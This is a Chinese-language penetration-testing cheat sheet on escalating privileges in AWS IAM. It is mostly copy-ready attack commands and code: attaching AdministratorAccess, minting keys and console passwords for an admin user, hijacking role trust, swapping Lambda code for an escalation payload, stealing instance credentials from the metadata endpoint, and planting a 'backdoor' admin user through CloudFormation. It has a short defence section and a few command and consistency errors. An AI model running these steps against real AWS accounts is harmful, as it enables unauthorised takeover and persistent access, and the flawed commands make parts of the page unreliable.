--- title: "AWS IAM 权限提升" weight: 10 date: "2026-03-09T08:58:49+08:00" lastmod: "2026-03-09T08:58:49+08:00" --- ## 概述 AWS IAM 权限提升是云安全渗透测试的核心技能。通过滥用 IAM 配置错误,攻击者可以从低权限角色提升到管理员权限。 **攻击等级**: ⭐⭐⭐⭐⭐ **适用场景**: 云环境渗透、横向移动 --- ## IAM 基础 ### 核心概念 | 术语 | 说明 | |------|------| | User | IAM 用户 | | Role | IAM 角色 (可被扮演) | | Group | 用户组 | | Policy | 权限策略 (JSON) | | Principal | 主体 (用户/角色/服务) | | Action | 操作 (s3:GetObject) | | Resource | 资源 (ARN) | ### 策略结构 ```json { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Action": "s3:GetObject", "Resource": "arn:aws:s3:::bucket/*" } ] } ``` --- ## 信息收集 ### 枚举当前权限 ```bash # 查看当前身份 aws sts get-caller-identity # 查看附加策略 aws iam list-attached-user-roles --user-name USERNAME aws iam list-attached-role-policies --role-name ROLENAME # 查看内联策略 aws iam list-user-policies --user-name USERNAME aws iam get-user-policy --user-name USERNAME --policy-name POLICY # 查看完整权限 (CloudSploit) python3 enumerate.py --profile PROFILE ``` ### 自动化工具 ```bash # Pacu (AWS 渗透框架) pacu > run iam__enum_permissions # CloudSploit node cloudsploit.js # ScoutSuite python3 scout.py aws --profile PROFILE ``` --- ## 常见提权手法 ### 1. iam:PassRole + iam:CreatePolicyVersion **原理**: 创建新策略版本,附加到自身。 **所需权限**: ```json { "Effect": "Allow", "Action": [ "iam:CreatePolicyVersion", "iam:SetDefaultPolicyVersion" ], "Resource": "arn:aws:iam::*:policy/POLICY_NAME" } ``` **利用**: ```bash # 1. 创建新策略版本 aws iam create-policy-version \ --policy-arn arn:aws:iam::ACCOUNT_ID:policy/POLICY \ --policy-document '{ "Version": "2012-10-17", "Statement": [{ "Effect": "Allow", "Action": "*", "Resource": "*" }] }' \ --set-as-default # 2. 验证权限 aws sts get-caller-identity ``` ### 2. iam:AttachUserPolicy / iam:AttachRolePolicy **原理**: 直接附加管理员策略。 **所需权限**: ```json { "Effect": "Allow", "Action": [ "iam:AttachUserPolicy", "iam:AttachRolePolicy" ], "Resource": "*" } ``` **利用**: ```bash # 附加管理员策略 aws iam attach-user-policy \ --user-name TARGET_USER \ --policy-arn arn:aws:iam::aws:policy/AdministratorAccess # 或附加到角色 aws iam attach-role-policy \ --role-name TARGET_ROLE \ --policy-arn arn:aws:iam::aws:policy/AdministratorAccess ``` ### 3. iam:CreateAccessKey **原理**: 为其他用户创建访问密钥。 **所需权限**: ```json { "Effect": "Allow", "Action": "iam:CreateAccessKey", "Resource": "arn:aws:iam::*:user/*" } ``` **利用**: ```bash # 为管理员创建密钥 aws iam create-access-key --user-name admin # 输出 { "AccessKey": { "AccessKeyId": "AKIA...", "SecretAccessKey": "SECRET" } } # 使用新密钥 aws configure --profile admin ``` ### 4. iam:UpdateAssumeRolePolicy + sts:AssumeRole **原理**: 修改角色信任策略,允许自己扮演。 **所需权限**: ```json { "Effect": "Allow", "Action": [ "iam:UpdateAssumeRolePolicy", "sts:AssumeRole" ], "Resource": "arn:aws:iam::*:role/TARGET_ROLE" } ``` **利用**: ```bash # 1. 修改信任策略 aws iam update-assume-role-policy \ --role-name TARGET_ROLE \ --policy-document '{ "Version": "2012-10-17", "Statement": [{ "Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::ACCOUNT_ID:user/ATTACKER"}, "Action": "sts:AssumeRole" }] }' # 2. 扮演角色 aws sts assume-role \ --role-arn arn:aws:iam::ACCOUNT_ID:role/TARGET_ROLE \ --role-session-name attack # 3. 使用临时凭证 export AWS_ACCESS_KEY_ID=... export AWS_SECRET_ACCESS_KEY=... export AWS_SESSION_TOKEN=... ``` ### 5. iam:CreateLoginProfile **原理**: 为用户创建控制台登录密码。 **所需权限**: ```json { "Effect": "Allow", "Action": "iam:CreateLoginProfile", "Resource": "arn:aws:iam::*:user/*" } ``` **利用**: ```bash # 创建登录密码 aws iam create-login-profile \ --user-name admin \ --password 'P@ssw0rd123!' \ --password-reset-required # 登录控制台 # https://ACCOUNT_ID.signin.aws.amazon.com/console ``` ### 6. lambda:UpdateFunctionCode + lambda:InvokeFunction **原理**: 修改 Lambda 代码,以 Lambda 角色执行。 **所需权限**: ```json { "Effect": "Allow", "Action": [ "lambda:UpdateFunctionCode", "lambda:InvokeFunction" ], "Resource": "*" } ``` **利用**: ```bash # 1. 创建恶意代码 cat > exploit.py << EOF import boto3 import os def lambda_handler(event, context): # 获取 Lambda 角色凭证 role_arn = os.environ['AWS_ROLE_ARN'] # 执行提权操作 iam = boto3.client('iam') iam.attach_role_policy( RoleName='TARGET_ROLE', PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess' ) EOF # 2. 打包 zip exploit.zip exploit.py # 3. 更新函数代码 aws lambda update-function-code \ --function-name TARGET_FUNCTION \ --zip-file fileb://exploit.zip # 4. 执行 aws lambda invoke \ --function-name TARGET_FUNCTION \ output.json ``` ### 7. ec2:RunInstances + iam:PassRole **原理**: 启动带有高权限角色的 EC2。 **所需权限**: ```json { "Effect": "Allow", "Action": [ "ec2:RunInstances", "iam:PassRole" ], "Resource": "*" } ``` **利用**: ```bash # 1. 启动 EC2 (带管理员角色) aws ec2 run-instances \ --image-id ami-12345678 \ --instance-type t2.micro \ --iam-instance-profile Name=ADMIN_PROFILE # 2. SSH 登录 ssh -i key.pem ec2-user@INSTANCE_IP # 3. 获取实例凭证 curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ADMIN_PROFILE ``` ### 8. glue:UpdateDevEndpoint / glue:CreateDevEndpoint **原理**: 修改 AWS Glue 开发端点,注入 SSH 密钥。 **所需权限**: ```json { "Effect": "Allow", "Action": [ "glue:UpdateDevEndpoint", "glue:CreateDevEndpoint" ], "Resource": "*" } ``` **利用**: ```bash # 1. 生成 SSH 密钥 ssh-keygen -t rsa # 2. 更新端点 aws glue update-dev-endpoint \ --endpoint-name TARGET_ENDPOINT \ --public-key "$(cat ~/.ssh/id_rsa.pub)" # 3. SSH 连接 ssh -i ~/.ssh/id_rsa glueservice@ENDPOINT_IP ``` ### 9. cloudformation:CreateStack **原理**: 创建 CloudFormation 堆栈,以堆栈角色执行。 **所需权限**: ```json { "Effect": "Allow", "Action": "cloudformation:CreateStack", "Resource": "*" } ``` **利用**: ```bash # 1. 创建恶意模板 cat > exploit.yaml << EOF AWSTemplateFormatVersion: '2010-09-09' Resources: BackdoorUser: Type: AWS::IAM::User Properties: UserName: backdoor BackdoorPolicy: Type: AWS::IAM::Policy Properties: PolicyName: AdminAccess PolicyDocument: Version: '2012-10-17' Statement: - Effect: Allow Action: '*' Resource: '*' Users: [backdoor] EOF # 2. 创建堆栈 aws cloudformation create-stack \ --stack-name exploit \ --template-body file://exploit.yaml \ --capabilities CAPABILITY_NAMED_IAM # 3. 使用后门用户 aws configure --profile backdoor ``` ### 10. sts:AssumeRole + 过度权限角色 **原理**: 扮演具有过度权限的角色。 **检测**: ```bash # 列出可扮演的角色 aws iam list-roles --query 'Roles[?AssumeRolePolicyDocument]' # 检查角色权限 aws iam get-role-policy --role-name ROLE_NAME --policy-name POLICY ``` **利用**: ```bash # 扮演角色 aws sts assume-role \ --role-arn arn:aws:iam::ACCOUNT_ID:role/OVERPERMISSIONED_ROLE \ --role-session-name attack # 使用临时凭证 export AWS_ACCESS_KEY_ID=... export AWS_SECRET_ACCESS_KEY=... export AWS_SESSION_TOKEN=... ``` --- ## 实战案例 ### 案例 1: 开发者到管理员 ```bash # 1. 初始访问 (泄露的访问密钥) aws configure --profile dev aws sts get-caller-identity # 2. 枚举权限 pacu > set_keys DEV_KEY DEV_SECRET > run iam__enum_permissions # 3. 发现 iam:AttachUserPolicy # 但仅限于特定策略 # 4. 创建新策略版本 aws iam create-policy-version \ --policy-arn arn:aws:iam::ACCOUNT_ID:policy/DeveloperPolicy \ --policy-document '{ "Version": "2012-10-17", "Statement": [{ "Effect": "Allow", "Action": "*", "Resource": "*" }] }' \ --set-as-default # 5. 验证提权 aws iam list-users # 成功! ``` ### 案例 2: EC2 实例角色提权 ```bash # 1. 获取实例凭证 curl http://169.254.169.254/latest/meta-data/iam/security-credentials/INSTANCE_ROLE # 2. 配置凭证 export AWS_ACCESS_KEY_ID=... export AWS_SECRET_ACCESS_KEY=... export AWS_SESSION_TOKEN=... # 3. 枚举权限 python3 enumerate.py # 4. 发现 iam:PassRole + ec2:RunInstances # 5. 启动新 EC2 (带管理员角色) aws ec2 run-instances \ --image-id ami-12345678 \ --instance-type t2.micro \ --iam-instance-profile Name=AdminProfile # 6. SSH 登录新实例 # 获取管理员权限 ``` ### 案例 3: Lambda 提权 ```bash # 1. 列出 Lambda 函数 aws lambda list-functions # 2. 检查权限 aws lambda get-policy --function-name TARGET # 3. 发现 lambda:UpdateFunctionCode # 4. 创建恶意代码 cat > exploit.py << EOF import boto3 def lambda_handler(event, context): iam = boto3.client('iam') iam.attach_user_policy( UserName='CURRENT_USER', PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess' ) EOF # 5. 更新并执行 zip exploit.zip exploit.py aws lambda update-function-code --function-name TARGET --zip-file fileb://exploit.zip aws lambda invoke --function-name TARGET output.json # 6. 验证权限 aws iam list-users # 成功! ``` --- ## 工具 ### Pacu ```bash # 安装 git clone https://github.com/RhinoSecurityLabs/pacu cd pacu pip install -r requirements.txt # 使用 python3 pacu.py > set_keys ACCESS_KEY SECRET_KEY > run iam__enum_permissions > run iam__privesc_scan > run ec2__enum ``` ### CloudSploit ```bash # 安装 git clone https://github.com/aquasecurity/cloudsploit cd cloudsploit npm install # 扫描 node index.js --profile PROFILE ``` ### ScoutSuite ```bash # 安装 pip install scoutsuite # 扫描 python3 scout.py aws --profile PROFILE python3 scout.py aws --access-keys ACCESS_KEY SECRET_KEY ``` ### enumerate-iam ```bash # 安装 git clone https://github.com/andresriancho/enumerate-iam cd enumerate-iam pip install -r requirements.txt # 枚举 python3 enumerate-iam.py --access-key KEY --secret-key SECRET ``` --- ## 防御建议 ### 最小权限 ```json // ❌ 过度权限 { "Effect": "Allow", "Action": "*", "Resource": "*" } // ✅ 最小权限 { "Effect": "Allow", "Action": [ "s3:GetObject", "s3:PutObject" ], "Resource": "arn:aws:s3:::specific-bucket/*" } ``` ### 权限边界 ```bash # 设置权限边界 aws iam put-user-permissions-boundary \ --user-name USERNAME \ --permissions-boundary arn:aws:iam::ACCOUNT_ID:policy/PermissionsBoundary ``` ### 监控检测 ```bash # CloudTrail 告警 # 监控以下事件: - iam:CreatePolicyVersion - iam:SetDefaultPolicyVersion - iam:AttachUserPolicy - iam:AttachRolePolicy - iam:CreateAccessKey - sts:AssumeRole # Config 规则 # 检查 IAM 策略变更 ``` --- ## 参考链接 - [HackTricks - AWS Privilege Escalation](https://book.hacktricks.wiki/cloud-methodology/aws-privilege-escalation) - [Rhino Security Labs - IAM Privilege Escalation](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) - [Pacu](https://github.com/RhinoSecurityLabs/pacu) - [AWS IAM Security](https://docs.aws.amazon.com/IAM/latest/UserGuide/security.html)